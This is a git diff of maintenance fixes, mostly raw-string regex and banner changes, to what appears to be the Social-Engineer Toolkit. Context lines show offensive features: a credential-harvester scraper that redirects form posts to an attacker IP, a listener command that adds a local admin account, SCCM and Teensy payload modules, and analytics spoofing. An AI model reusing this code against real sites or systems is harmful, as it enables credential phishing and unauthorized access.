diff --git a/modules/google_analytics_attack.py b/modules/google_analytics_attack.py
index 1d807be74..da180f24d 100644
--- a/modules/google_analytics_attack.py
+++ b/modules/google_analytics_attack.py
@@ -71,7 +71,7 @@ def send_spoof(params):
### auto_params - makes request to target site, regexes for params
def auto_params(url):
try: #parses URL for host and page
- m = re.search('(https?:\/\/(.*?))\/(.*)',url)
+ m = re.search(r'(https?:\/\/(.*?))\/(.*)',url)
host = str(m.group(1))
page = "/" + str(m.group(3))
except:
@@ -83,7 +83,7 @@ def auto_params(url):
print("\n[-] Unable to reach target website for parsing.\n")
sys.exit()
try: #parses target webpage for title
- m = re.search('
(.*)<\/title>', r.text)
+ m = re.search(r'(.*)<\/title>', r.text)
page_title = str(m.group(1))
except:
print("\n[-] Unable to parse target page for title.\n")
diff --git a/src/core/fasttrack.py b/src/core/fasttrack.py
index 4e2c6241e..b0f876bca 100644
--- a/src/core/fasttrack.py
+++ b/src/core/fasttrack.py
@@ -417,7 +417,7 @@ try:
#
#
if attack_vector == "5":
- print (""".______ __ _______ _______ .__ __. __ __ .___ ___.
+ print (r""".______ __ _______ _______ .__ __. __ __ .___ ___.
| _ \ | | | \ | ____|| \ | | | | | | | \/ |
| |_) | | | | .--. | | |__ | \| | | | | | | \ / |
| / | | | | | | | __| | . ` | | | | | | |\/| |
diff --git a/src/core/setcore.py b/src/core/setcore.py
index 74c09ca25..64f4e5df8 100644
--- a/src/core/setcore.py
+++ b/src/core/setcore.py
@@ -1365,7 +1365,7 @@ def kill_proc(port, flag):
proc = subprocess.Popen("netstat -antp | grep '%s'" %
(port), shell=True, stdout=subprocess.PIPE)
stdout_value = proc.communicate()[0]
- a = re.search("\d+/%s" % (flag), stdout_value)
+ a = re.search(r"\d+/%s" % (flag), stdout_value)
if a:
b = a.group()
b = b.replace("/%s" % (flag), "")
@@ -1803,7 +1803,7 @@ def printCIDR(c):
def validateCIDRBlock(b):
# appropriate format for CIDR block ($prefix/$subnet)
- p = re.compile("^([0-9]{1,3}\.){0,3}[0-9]{1,3}(/[0-9]{1,2}){1}$")
+ p = re.compile(r"^([0-9]{1,3}\.){0,3}[0-9]{1,3}(/[0-9]{1,2}){1}$")
if not p.match(b):
return False
# extract prefix and subnet size
diff --git a/src/fasttrack/ridenum.py b/src/fasttrack/ridenum.py
index 24ade8f19..9e7e1b305 100755
--- a/src/fasttrack/ridenum.py
+++ b/src/fasttrack/ridenum.py
@@ -32,7 +32,7 @@ except ImportError:
def usage():
- print("""
+ print(r"""
.______ __ _______ _______ .__ __. __ __ .___ ___.
| _ \ | | | \ | ____|| \ | | | | | | | \/ |
| |_) | | | | .--. | | |__ | \| | | | | | | \ / |
diff --git a/src/fasttrack/sccm/sccm_main.py b/src/fasttrack/sccm/sccm_main.py
index 0e0d1fea5..9bb1dea4a 100644
--- a/src/fasttrack/sccm/sccm_main.py
+++ b/src/fasttrack/sccm/sccm_main.py
@@ -21,7 +21,7 @@ print("The" + core.bcolors.BOLD + " SCCM Attack Vector " + core.bcolors.ENDC +
sms_server = input("Enter the IP address or hostname of the SMS Server: ")
package_id = input("Enter the Package ID of the package you want to patch: ")
-configuration = '''
+configuration = r'''
# configuration file written by Dave DeSimone and Bill Readshaw
# attack vector presented at Defcon 20
# added to set 07/27/2012
diff --git a/src/payloads/set_payloads/listener.py b/src/payloads/set_payloads/listener.py
index 19f0f5c96..916b20606 100755
--- a/src/payloads/set_payloads/listener.py
+++ b/src/payloads/set_payloads/listener.py
@@ -391,7 +391,7 @@ Explanation: Reboots the remote server instantly.
Example: reboot now""")
# if we're running under windows
if operating_system == "windows":
- print("""
+ print(r"""
Command: localadmin
Explanation: adds a local admin to the system
Example: localadmin bob p@55w0rd!
diff --git a/src/teensy/binary2teensy.py b/src/teensy/binary2teensy.py
index 738a61ff1..b9c7d64dd 100644
--- a/src/teensy/binary2teensy.py
+++ b/src/teensy/binary2teensy.py
@@ -124,12 +124,12 @@ try:
# except keyboardintterupts here
except KeyboardInterrupt:
- print("""
+ print(r"""
.-. .-. . . .-. .-. .-. .-. .-. . . .-. .-. .-.
|.. |-| |\| |.. `-. | |- |( |\/| | | | )|-
`-' ` ' ' ` `-' `-' ' `-' ' ' ' ` `-' `-' `-'
- disabled.\n""")
-
+ disabled.""")
+ print()
sys.exit("\n[!] Control-C detected. Bombing out. Later Gangster...\n\n")
print_status("Generating alpha_mixed shellcode to be injected after shellexec has been deployed on victim...")
diff --git a/src/teensy/sd2teensy.py b/src/teensy/sd2teensy.py
index f2680a86a..f144319ea 100644
--- a/src/teensy/sd2teensy.py
+++ b/src/teensy/sd2teensy.py
@@ -43,11 +43,12 @@ written out through the keyboard.
""")
# if we hit here we are good since msfvenom is installed
-print("""
+print(r"""
.-. .-. . . .-. .-. .-. .-. .-. . . .-. .-. .-.
|.. |-| |\| |.. `-. | |- |( |\/| | | | )|-
`-' ` ' ' ` `-' `-' ' `-' ' ' ' ` `-' `-' `-'
- enabled.\n""")
+ enabled.""")
+print()
# grab the path and filename from user
path = input(core.setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
diff --git a/src/webattack/harvester/scraper.py b/src/webattack/harvester/scraper.py
index db5620c49..3cc4d2b27 100644
--- a/src/webattack/harvester/scraper.py
+++ b/src/webattack/harvester/scraper.py
@@ -76,13 +76,13 @@ for line in fileopen:
# web server running to post the data to your site
if ssl_flag == 'false':
line = re.sub(
- 'action="http?\w://[\w.\?=/&]*/', 'action="http://%s/' % (ipaddr), line)
+ r'action="http?\w://[\w.\?=/&]*/', 'action="http://%s/' % (ipaddr), line)
if apache_mode == "on":
line = re.sub(
'action="*"', 'action="http://%s/post.php"' % (ipaddr), line)
if ssl_flag == 'true':
line = re.sub(
- 'action="http?\w://[\w.\?=/&]*/', 'action="https://%s/' % (ipaddr), line)
+ r'action="http?\w://[\w.\?=/&]*/', 'action="https://%s/' % (ipaddr), line)
if apache_mode == "on":
line = re.sub(
'action="*"', 'action="http://%s/post.php"' % (ipaddr), line)